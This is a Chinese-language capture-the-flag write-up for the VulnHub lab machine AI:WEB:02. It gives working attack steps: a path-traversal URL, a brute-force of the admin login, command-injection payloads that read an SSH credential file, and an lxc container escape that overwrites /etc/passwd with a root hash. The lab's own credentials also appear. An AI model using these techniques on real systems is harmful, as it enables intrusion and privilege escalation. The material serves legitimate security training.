AI:WEB:02靶场题解

AI:WEB:02靶场题解

前期准备

镜像下载

https://www.vulnhub.com/entry/ai-web-2,357/

环境配置：

在VM以net连接打开虚拟机

使用的机器：

攻击机：kali linux
靶机：ip随配(192.168.203.136)

渗透开始

1.nmap发现主机，并扫描其ip信息，

nmap --script=vuln 192.168.203.136
发现路径 /webadmin

使用路径爆破工具：

检测存在文件
viewing.php
download.php

2.访问网页，并创建登陆账号，发现文件包含漏洞，读取文件

访问网页，注册并登陆账号

访问文件地址，存在文件包含漏洞，读取apache默认配置文件路径
http://192.168.203.136/viewing.php?file_name=…/…/…/…/…/…/…/…/…//etc/apache2/sites-enabled/000-default.conf

读取文件 .htpasswd

发现账户 aiweb2admin

3.爆破账号密码

要是你仔细阅读镜像安装界面作者给的描述 https://www.vulnhub.com/entry/ai-web-2,357/，发现提示爆破的字典

字典下载：https://github.com/danielmiessler/SecLists
rockyou-45.txt 存在于路径 seclists/Passwords/Leaked-Databases

字典，账号有了，访问页面 http://192.168.203.136/webadmin
输入账号密码并抓包

配置好参数，字典爆破：

获得账号密码 aiweb2admin:c.ronaldo
登陆账号

4.找到命令执行的文件，获取ssh登陆账号

命令执行文件：

http://192.168.203.136/webadmin/H05Tpin9555/#

1.127.0.0.1|find . -type f /var/www/html
2. 127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt

获取ssh登陆账号密码：
User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

5.提权

ssh登陆帐号 n0nr00tuser
ssh [email protected]

查看二进制文件
find / -perm -u=s -type f 2>/dev/null
浏览完，
这个账户对 lxc （https://blog.csdn.net/u011630575/article/details/65444404）命令权限比较大，以此为突破口，
尝试创建一个容器，并重新写入一个root用户带有密码的passwd文件上传到创建的容器里，
以此来覆盖主机上的passwd文件，再提权为root

lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring

在主机上新建一个passwd文件，并赋予root密码killem

root:AzbGfP688Nta.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aiweb2:x:1000:1000::/home/aiweb2:/bin/bash
n0nr00tuser:x:1001:1001::/home/n0nr00tuser:/bin/bash

在执行命令，将passwd上传到容器里
lxc file push passwd UbuntuMini/sharingiscaring/passwd

提权：

su -root
输入密码
whoami
cat /root/flag.txt